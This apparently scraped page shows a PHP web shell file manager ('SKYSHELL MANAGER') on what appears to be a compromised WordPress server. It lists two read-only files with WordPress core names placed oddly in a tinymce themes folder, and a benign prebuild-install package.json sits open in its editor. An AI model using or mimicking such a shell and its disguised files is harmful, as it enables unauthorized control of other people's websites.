📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "_from": "prebuild-install@6.1.4", "_id": "prebuild-install@6.1.4", "_inBundle": false, "_integrity": "sha512-Z4vpywnK1lBg+zdPCVCsKq0xO66eEV9rWo2zrROGGiRS4JtueBOdlB1FnY8lcy7JsUud/Q3ijUxyWN26Ika0vQ==", "_location": "/@budibase/cli/prebuild-install", "_phantomChildren": {}, "_requested": { "type": "version", "registry": true, "raw": "prebuild-install@6.1.4", "name": "prebuild-install", "escapedName": "prebuild-install", "rawSpec": "6.1.4", "saveSpec": null, "fetchSpec": "6.1.4" }, "_requiredBy": [ "/@budibase/cli/pkg" ], "_resolved": "https://registry.npmjs.org/prebuild-install/-/prebuild-install-6.1.4.tgz", "_shasum": "ae3c0142ad611d58570b89af4986088a4937e00f", "_spec": "prebuild-install@6.1.4", "_where": "/usr/local/lib/node_modules/@budibase/cli/node_modules/pkg", "author": { "name": "Mathias Buus", "url": "@mafintosh" }, "bin": { "prebuild-install": "bin.js" }, "bugs": { "url": "https://github.com/prebuild/prebuild-install/issues" }, "bundleDependencies": false, "contributors": [ { "name": "Julian Gruber", "email": "julian@juliangruber.com", "url": "https://github.com/juliangruber" }, { "name": "Brett Lawson", "email": "brett19@gmail.com", "url": "https://github.com/brett19" }, { "name": "Pieter Hintjens", "email": "ph@imatix.com", "url": "https://github.com/hintjens" }, { "name": "Lars-Magnus Skog", "email": "ralphtheninja@riseup.net", "url": "https://github.com/ralphtheninja" }, { "name": "Jesús Leganés Combarro", "email": "piranna@gmail.com", "url": "https://github.com/piranna" }, { "name": "Mathias Küsel", "email": "mathiask@hotmail.de", "url": "https://github.com/mathiask88" }, { "name": "Lukas Geiger", "email": "lukas.geiger94@gmail.com", "url": "https://github.com/lgeiger" } ], "dependencies": { "detect-libc": "^1.0.3", "expand-template": "^2.0.3", "github-from-package": "0.0.0", "minimist": "^1.2.3", "mkdirp-classic": "^0.5.3", "napi-build-utils": "^1.0.1", "node-abi": "^2.21.0", "npmlog": "^4.0.1", "pump": "^3.0.0", "rc": "^1.2.7", "simple-get": "^3.0.3", "tar-fs": "^2.0.0", "tunnel-agent": "^0.6.0" }, "deprecated": false, "description": "A command line tool to easily install prebuilt binaries for multiple version of node/iojs on a specific platform", "devDependencies": { "a-native-module": "^1.0.0", "hallmark": "^3.0.0", "nock": "^10.0.6", "rimraf": "^2.5.2", "standard": "^13.0.2", "tape": "^4.5.1", "tempy": "0.2.1" }, "engines": { "node": ">=6" }, "homepage": "https://github.com/prebuild/prebuild-install", "keywords": [ "prebuilt", "binaries", "native", "addon", "module", "c", "c++", "bindings", "devops", "napi" ], "license": "MIT", "name": "prebuild-install", "repository": { "type": "git", "url": "git+https://github.com/prebuild/prebuild-install.git" }, "scripts": { "hallmark": "hallmark --fix", "lint": "standard && hallmark", "test": "tape test/*-test.js && npm run lint" }, "version": "6.1.4" }
Save